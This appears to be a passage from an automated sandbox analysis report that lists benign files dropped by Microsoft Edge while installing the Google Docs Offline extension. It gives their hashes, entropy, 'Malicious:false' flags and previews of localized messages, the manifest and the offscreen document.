                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"UTW\u00d3RZ NOWY"},"explanationofflinedisabled":{"message":"Jeste\u015b offline. Aby korzysta\u0107 z Dokument\u00f3w Google bez po\u0142\u0105czenia internetowego, otw\u00f3rz ustawienia na stronie g\u0142\u00f3wnej Dokument\u00f3w Google i w\u0142\u0105cz synchronizacj\u0119 offline nast\u0119pnym razem, gdy b\u0119dziesz mie\u0107 dost\u0119p do internetu."},"explanationofflineenabled":{"message":"Jeste\u015b offline, ale nadal mo\u017cesz edytowa\u0107 dost\u0119pne pliki i tworzy\u0107 nowe."},"extdesc":{"message":"Edytuj, tw\u00f3rz i wy\u015bwietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno\u015bci \u0142\u0105czenia si\u0119 z internetem."},"extname":{"message":"Dokumenty Google offline"},"learnmore":{"message":"Wi\u0119cej informacji"},"popuphelptext":{"message":"Pisz, edytuj i wsp\u00f3\u0142pracuj, gdziekolwiek jeste\u015b \u2013 niezale\u017cnie od tego, czy masz po\u0142\u0105czenie z internetem."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):930
                                                                                                                                                                                                                                                                          Entropy (8bit):4.836475333440799
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGN0xLwuNuOHViHfVMVIkHKX3x+g93dxaX6M5Vgdt70YRpRyHmfXZjv7n:YtBw+u1HfYIIE3tdxaKM0dhhRHN7
                                                                                                                                                                                                                                                                          MD5:EE122CF26EBE1AD0CC733B117A89FF3B
                                                                                                                                                                                                                                                                          SHA1:A7C21E40AB7C934B35D725B3E21E4CB8EA85BC1E
                                                                                                                                                                                                                                                                          SHA-256:4ECEDB9C1F3DD0D0E3AEB86146561B3D7E58656CBDBED1A39B91737B52EC7F2C
                                                                                                                                                                                                                                                                          SHA-512:4866FBEA6C8698EB3C8923B9875186C800519488784683C18E5E6523681C52429E7BA38A304E0D1B17A3997A2F4C8C3A5E9FB518466A910B119F65D7DD62B77D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREEAZ\u0102 UN DOCUMENT"},"explanationofflinedisabled":{"message":"E\u0219ti offline. Pentru a utiliza Documente Google f\u0103r\u0103 conexiune la internet, intr\u0103 \u00een set\u0103rile din pagina principal\u0103 Documente Google \u0219i activeaz\u0103 sincronizarea offline data viitoare c\u00e2nd e\u0219ti conectat(\u0103) la internet."},"explanationofflineenabled":{"message":"E\u0219ti offline, dar po\u021bi \u00eenc\u0103 s\u0103 editezi fi\u0219ierele disponibile sau s\u0103 creezi altele."},"extdesc":{"message":"Editeaz\u0103, creeaz\u0103 \u0219i acceseaz\u0103 documente, foi de calcul \u0219i prezent\u0103ri - totul f\u0103r\u0103 acces la internet."},"extname":{"message":"Documente Google Offline"},"learnmore":{"message":"Afl\u0103 mai multe"},"popuphelptext":{"message":"Scrie, editeaz\u0103 \u0219i colaboreaz\u0103 oriunde ai fi, cu sau f\u0103r\u0103 conexiune la internet."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):855
                                                                                                                                                                                                                                                                          Entropy (8bit):4.747197911597479
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGgx11/KXowwJrpv8wNgEcPJJJEEXLW5xwJuj4aj3gdyKDxXDMNuwMwu8KnJ4dOl:Yzt/KYw8VtNLcaECmajwdNdXDinWaNO
                                                                                                                                                                                                                                                                          MD5:9CDFA5371F28427F129D200338C47494
                                                                                                                                                                                                                                                                          SHA1:19653347E92967564BD8DF14FDE2EEA2DC87BCEB
                                                                                                                                                                                                                                                                          SHA-256:75D018CC8525605DDC591F6BFE5BDAA2EFB164934E9D5438972651F8C818D581
                                                                                                                                                                                                                                                                          SHA-512:E6122FD5C8D387A999EF57C877BB70C896C1012B592333BCF2B93E44F7E8BA487F264E83CDEFBBDE972040CF6DC8F14A4A9E0E0BCA85CF1F9EAA35B817DD2869
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"USTVARI NOVO"},"explanationofflinedisabled":{"message":"Nimate vzpostavljene povezave. \u010ce \u017eelite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma\u010di strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji\u010d vzpostavite internetno povezavo."},"explanationofflineenabled":{"message":"Nimate vzpostavljene povezave, vendar lahko \u0161e vedno urejate razpolo\u017eljive datoteke ali ustvarjate nove."},"extdesc":{"message":"Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve \u2013 vse to brez internetnega dostopa."},"extname":{"message":"Google Dokumenti brez povezave"},"learnmore":{"message":"Ve\u010d o tem"},"popuphelptext":{"message":"Pi\u0161ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2868
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5980354067400313
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YTDQ8m6jQLQgILQszrCQHUij6VQqTTkLQqZb+i/6JVjElQFs3QFpQcZQIXi/6JV3:1UFUzYDKiwIbCLvi6j6f2riOI8
                                                                                                                                                                                                                                                                          MD5:C2026342237E7686B1932AF5B54F8110
                                                                                                                                                                                                                                                                          SHA1:5AF235B29947C7F770070F0A693979D9191FADB5
                                                                                                                                                                                                                                                                          SHA-256:A3EB276FBD19DCE2B00DB6937578B214B9E33D67487659FE0BF21A86225ECE73
                                                                                                                                                                                                                                                                          SHA-512:2CE6FFFA4EA16AAC65ACC8B5C1C9952EAE1AC8891589266735C3EF0A0D20E2FA76940E6401D86EEF5C87A1D24C1CC9A1CAAF1C66819C56505B0B2860BFE5ACFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u041d\u0410\u041f\u0420\u0410\u0412\u0418 \u041d\u041e\u0412\u041e"},"explanationofflinedisabled":{"message":"\u041e\u0444\u043b\u0430\u0458\u043d \u0441\u0442\u0435. \u0414\u0430 \u0431\u0438\u0441\u0442\u0435 \u043a\u043e\u0440\u0438\u0441\u0442\u0438\u043b\u0438 Google \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0435 \u0431\u0435\u0437 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0432\u0435\u0437\u0435, \u0438\u0434\u0438\u0442\u0435 \u0443 \u043f\u043e\u0434\u0435\u0448\u0430\u0432\u0430\u045a\u0430 \u043d\u0430 \u043f\u043e\u0447\u0435\u0442\u043d\u043e\u0458 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0438 Google \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0430\u0442\u0430 \u0438 \u0443\u043a\u0459\u0443\u0447\u0438\u0442\u0435 \u043e\u0444\u043b\u0430\u0458\u043d \u0441\u0438\u043d\u0445\u0440\u043e\u043d\u0438\u0437\u0430\u0446\u0438\u0458\u0443 \u043a\u0430\u0434 \u0441\u043b\u0435\u0434\u0435\u045b\u0438 \u043f\u0443\u0442 \u0431\u0443\u0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):840
                                                                                                                                                                                                                                                                          Entropy (8bit):4.608011285510927
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGqWxSLB1HMHyMhybK7QGU78oCuafIvQx3LB6EYPE5E1pKgdJONfw+yehEL5cTT3:YvWknQ3y0Q/KjVFKzFdSo+ye0cTTBaQ
                                                                                                                                                                                                                                                                          MD5:84EB1D6E827E40C578469EAAB778E368
                                                                                                                                                                                                                                                                          SHA1:3F53DE16AB05F7E03AE6C8605C2339043C1A385F
                                                                                                                                                                                                                                                                          SHA-256:2C6B42D122943DC0CA92A33074D1A607351D3BC7F9768E174617FA7011A3DE9F
                                                                                                                                                                                                                                                                          SHA-512:7A7CE81FA8BE309D347AE0975FD6FCD904BC1EE86342DC0E88E789E7CF5967EDD0DDCCB9BA156510E74B025A23D479B6058101FFBB648C5D30C311F5BA1DFC6B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"FUNGUA MPYA"},"explanationofflinedisabled":{"message":"Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao."},"explanationofflineenabled":{"message":"Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya."},"extdesc":{"message":"Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako \u2014 yote bila kutumia muunganisho wa intaneti."},"extname":{"message":"Hati za Google Nje ya Mtandao"},"learnmore":{"message":"Pata Maelezo Zaidi"},"popuphelptext":{"message":"Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3286
                                                                                                                                                                                                                                                                          Entropy (8bit):3.746723088270005
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YJp0pi1W3o6TcKJq0pwHZycPuYpJ3bhpAcinp+MDtUpdp7cz7XvyYpZkFS4S/duW:QzW3RTcLxcEELdCS/du2dE4N8/cgp+
                                                                                                                                                                                                                                                                          MD5:24626AD7B8058866033738380776F59B
                                                                                                                                                                                                                                                                          SHA1:A6ABD9AB8BA022EA6619252DF8422BF5F73B6A24
                                                                                                                                                                                                                                                                          SHA-256:3FC7F56F6D6D514B32547509B39F6380FC786EFBCCA4B9859F204456CA2E7957
                                                                                                                                                                                                                                                                          SHA-512:4FA2F084175D71923AE3186C8195781E1946F6C19B1A4BF659D3AE2DC45F1AC2F84D794B4487EC5E030EA899EE1DECF07B3CDD3EB0D3DDA996C5FF8A272CF97A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0baa\u0bc1\u0ba4\u0bbf\u0baf \u0b86\u0bb5\u0ba3\u0ba4\u0bcd\u0ba4\u0bc8 \u0b89\u0bb0\u0bc1\u0bb5\u0bbe\u0b95\u0bcd\u0b95\u0bc1"},"explanationofflinedisabled":{"message":"\u0b86\u0b83\u0baa\u0bcd\u0bb2\u0bc8\u0ba9\u0bbf\u0bb2\u0bcd \u0b89\u0bb3\u0bcd\u0bb3\u0bc0\u0bb0\u0bcd\u0b95\u0bb3\u0bcd. \u0b87\u0ba3\u0bc8\u0baf \u0b87\u0ba3\u0bc8\u0baa\u0bcd\u0baa\u0bc1 \u0b87\u0ba9\u0bcd\u0bb1\u0bbf Google \u0b86\u0bb5\u0ba3\u0ba4\u0bcd\u0ba4\u0bc8\u0baa\u0bcd \u0baa\u0baf\u0ba9\u0bcd\u0baa\u0b9f\u0bc1\u0ba4\u0bcd\u0ba4, \u0b85\u0b9f\u0bc1\u0ba4\u0bcd\u0ba4 \u0bae\u0bc1\u0bb1\u0bc8 \u0b87\u0ba3\u0bc8\u0baf\u0ba4\u0bcd\u0ba4\u0bc1\u0b9f\u0ba9\u0bcd \u0b87\u0ba3\u0bc8\u0b95\u0bcd\u0b95\u0bc1\u0bae\u0bcd \u0baa\u0bcb\u0ba4\u0bc1, Google \u0b86\u0bb5\u0ba3 \u0bae\u0bc1\u0b95\u0baa\u0bcd\u0baa\u0bc1\u0baa\u0bcd\u0baa\u0b95\u0bcd\u0b95\u0ba4\u0bcd\u0ba4\u0bbf\u0bb2\u0bcd \u0b85\u0bae\u0bc8\u0baa\u0bcd\u0baa\u0bc1\u0b95\u0bb3\u0bc1\u0b95\u0bcd\u0b95\u0bc1\u0b9a\u0bcd \u0b9a\u0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1160
                                                                                                                                                                                                                                                                          Entropy (8bit):4.85701156608368
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YjFxFDocXDmcHAc4KhrUdPuWDM43rXecHg:YjFPDtDmIVdh07DM2c
                                                                                                                                                                                                                                                                          MD5:3104BCD0D4AD6B47FE36F36C1B5AA333
                                                                                                                                                                                                                                                                          SHA1:36EC46C7230487C0D26E185AA82F340D8312A265
                                                                                                                                                                                                                                                                          SHA-256:AC2894CEA6332450095A7F8FC9B97550DA87E4B4B6E6FB95DF1A1F49F25E0E35
                                                                                                                                                                                                                                                                          SHA-512:873A8E1EC1EB2B482794C51DBFDD5B96CB9E8E2B5A74DB3C3B54AE78A396585FAEC402A054FF332551B5EBCFC4A57BFC5BD92D08F9F73ACB433EFE9A18D89CD3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"YEN\u0130 OLU\u015eTUR"},"explanationofflinedisabled":{"message":"\u0130nternet'e ba\u011fl\u0131 de\u011filsiniz. Google Dok\u00fcmanlar'\u0131 \u0130nternet ba\u011flant\u0131s\u0131 olmadan kullanmak i\u00e7in, \u0130nternet'e ba\u011flanabildi\u011finizde Google Dok\u00fcmanlar ana sayfas\u0131nda Ayarlar'a gidin ve \u00e7evrimd\u0131\u015f\u0131 senkronizasyonu etkinle\u015ftirin."},"explanationofflineenabled":{"message":"\u0130nternet'e ba\u011fl\u0131 de\u011filsiniz. Ancak, yine de mevcut dosyalar\u0131 d\u00fczenleyebilir veya yeni dosyalar olu\u015fturabilirsiniz."},"extdesc":{"message":"Dok\u00fcman, e-tablo ve sunu olu\u015fturun, bunlar\u0131 d\u00fczenleyin ve g\u00f6r\u00fcnt\u00fcleyin. T\u00fcm bu i\u015flemleri internet eri\u015fimi olmadan yapabilirsiniz."},"extname":{"message":"Google Dok\u00fcmanlar \u00c7evrimd\u0131\u015f\u0131"},"learnmore":{"message":"Daha Fazla Bilgi"},"popuphelptext":{"message":"\u0130nternet ba\u011flant\u0131n\u0131

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2925
                                                                                                                                                                                                                                                                          Entropy (8bit):3.605034846503948
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y4o1Qs91QLrjrZLQO3Qq1R3yNQikZd14D6VQxHoQ3cQs9NQ4hQwrQ8QcxQApQbnm:Ro136p5VRempdkcvhhhRXHTPQYVu8dHB
                                                                                                                                                                                                                                                                          MD5:AE938164F7AC0E7C7F120742DE2BEB1E
                                                                                                                                                                                                                                                                          SHA1:FC49041249EAEF40632F27FAA8561582D510D4E3
                                                                                                                                                                                                                                                                          SHA-256:08978A1425DEC304483BBB7DD0E55A7D850C4561ABD41BAC1BE5D93D70465174
                                                                                                                                                                                                                                                                          SHA-512:B3F252885F9D7E4D74A5880B5FA60447511D4E2DCE64DB8EDE5BD1B144F0F09A3C784649C2E1623A034DDD50B6B7FF990A3A6FC58C3AE124646C31F35B0B20FD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0421\u0422\u0412\u041e\u0420\u0418\u0422\u0418"},"explanationofflinedisabled":{"message":"\u0412\u0438 \u0432 \u0440\u0435\u0436\u0438\u043c\u0456 \u043e\u0444\u043b\u0430\u0439\u043d. \u0429\u043e\u0431 \u043a\u043e\u0440\u0438\u0441\u0442\u0443\u0432\u0430\u0442\u0438\u0441\u044f Google \u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 \u0431\u0435\u0437 \u0437\u2019\u0454\u0434\u043d\u0430\u043d\u043d\u044f \u0437 \u0406\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u043e\u043c, \u043f\u0435\u0440\u0435\u0439\u0434\u0456\u0442\u044c \u0443 \u043d\u0430\u043b\u0430\u0448\u0442\u0443\u0432\u0430\u043d\u043d\u044f \u043d\u0430 \u0434\u043e\u043c\u0430\u0448\u043d\u0456\u0439 \u0441\u0442\u043e\u0440\u0456\u043d\u0446\u0456 Google \u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0456\u0432 \u0456 \u0432\u0432\u0456\u043c\u043a\u043d\u0456\u0442\u044c \u043e\u0444\u043b\u0430\u0439\u043d-\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u0456\u0437\u0430

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1222
                                                                                                                                                                                                                                                                          Entropy (8bit):4.477774650892186
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YfC5eWpbTu5ViOswIBd5ayo4ErdI0+75CVekIdq5XEEbB:Yf6HuOn17Z/EpI08Tdq5/bB
                                                                                                                                                                                                                                                                          MD5:E910D3F03F0349F5C8A6A541107375D5
                                                                                                                                                                                                                                                                          SHA1:2F3482194C98ECBD58A42BD29BB853267C49A39A
                                                                                                                                                                                                                                                                          SHA-256:3893C066A36FE95F06F3C49091A20290D4E071183755F40AF05455660BEDA2DC
                                                                                                                                                                                                                                                                          SHA-512:387CA0727AD0869041296182F17555F55552245D38284A1D5D2652B72959CC94DD345F8A1D6D15F7F5477817DF9AFA045F2267269D0D66938C7D401B4CA2EB4B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u65b0\u5efa"},"explanationofflinedisabled":{"message":"\u60a8\u5904\u4e8e\u79bb\u7ebf\u72b6\u6001\u3002\u8981\u5728\u672a\u8fde\u63a5\u5230\u4e92\u8054\u7f51\u7684\u60c5\u51b5\u4e0b\u4f7f\u7528 Google \u6587\u6863\uff0c\u8bf7\u5728\u4e0b\u6b21\u8fde\u63a5\u5230\u4e92\u8054\u7f51\u65f6\u8f6c\u5230 Google \u6587\u6863\u9996\u9875\u7684\u201c\u8bbe\u7f6e\u201d\uff0c\u5e76\u5f00\u542f\u79bb\u7ebf\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u5904\u4e8e\u79bb\u7ebf\u72b6\u6001\uff0c\u4f46\u662f\u60a8\u4ecd\u7136\u53ef\u4ee5\u7f16\u8f91\u53ef\u7528\u7684\u6587\u4ef6\u6216\u521b\u5efa\u65b0\u6587\u4ef6\u3002"},"extdesc":{"message":"\u7f16\u8f91\u3001\u521b\u5efa\u548c\u67e5\u770b\u60a8\u7684\u6587\u6863\u3001\u7535\u5b50\u8868\u683c\u548c\u6f14\u793a\u6587\u7a3f - \u65e0\u9700\u8fde\u63a5\u4e92\u8054\u7f51\u3002"},"extname":{"message":"Google \u6587\u6863\u7684\u79bb\u7ebf\u529f\u80fd"},"learnmore":{"message":"\u4e86\u89e3\u8be6\u60c

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1153
                                                                                                                                                                                                                                                                          Entropy (8bit):4.523803059612515
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YWxqB0YuWFvgmwtB9O6diXSB+u9Dgw2PW4S:YWxqgJ8uHB+u98I
                                                                                                                                                                                                                                                                          MD5:B571E4CEFD96A2651FFB6621C4D3D1B4
                                                                                                                                                                                                                                                                          SHA1:9FCE97192139D1EC0885FD62A059FA81E473F9C5
                                                                                                                                                                                                                                                                          SHA-256:16B8F7BE42B982D5AD9F638E71DA38D134394B9BAB9255F73CF514ABBFAAF146
                                                                                                                                                                                                                                                                          SHA-512:6A315031B7C3E7B2CDEE7A835AAAD7FCEB07D2889E4401E3BE6B3A8C6492A47A9A065AAB85FE2A69A1ECA6BFE4A733F8CCFE8C5EC2FEF681AADB77C9F5E57EFF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u6587\u4ef6"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u96e2\u7dda\u72c0\u614b\u4e0b\u4f7f\u7528 Google \u6587\u4ef6\uff0c\u8acb\u5728\u4e0b\u6b21\u9023\u4e0a\u7db2\u969b\u7db2\u8def\u6642\u524d\u5f80 Google \u6587\u4ef6\u9996\u9801\u7684\u8a2d\u5b9a\u4e2d\u555f\u7528\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u4ecd\u53ef\u7de8\u8f2f\u53ef\u7528\u7684\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u5373\u4f7f\u5728\u96e2\u7dda\u72c0\u614b\u4e0b\uff0c\u4e5f\u80fd\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u700f\u89bd\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\u3002"},"extname":{"message":"Google \u6587\u4ef6\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a73\u60c5"},"popuphelptext":{"message":"\u7121\u8ad6\u4e0a\u7dda\u6216\u96e2\u7dda\

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1906
                                                                                                                                                                                                                                                                          Entropy (8bit):4.902952950578737
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YlPoaIELb/7duGf3aGELb/PLtmLY1Dx16/qY11WYMQVvktTa:YlPdrLTRuGfqZLTPeA36/qoWXQVf
                                                                                                                                                                                                                                                                          MD5:FDD84176E246824C748BC9EA6BBC3653
                                                                                                                                                                                                                                                                          SHA1:4C2FC398308428A257D743153B3A2A90FC79B3D5
                                                                                                                                                                                                                                                                          SHA-256:E2ACD1525DD716D55462F73A122E79070D0B12F2DAE3DA8B4B83D5CE59E568D9
                                                                                                                                                                                                                                                                          SHA-512:DA48AE01704F3FA61FC5684F9638177D511FBAFC3C782F9D61066E18FA82A036C25C4691F73D3266F53ED496F87B6484195370F39B34248ACEC16C3AE3D635FE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"background": {"service_worker": "service_worker_bin_prod.js"}, "content_capabilities": {"matches": ["https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*"], "permissions": ["clipboardRead", "clipboardWrite", "unlimitedStorage"]}, "content_security_policy": {"extension_pages": "script-src 'self'; object-src 'self'"}, "default_locale": "en_US", "description": "__MSG_extDesc__", "externally_connectable": {"matches": ["https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*",

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                                                          Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                          MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                          SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                          SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                          SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):122218
                                                                                                                                                                                                                                                                          Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                          MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                          SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                          SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
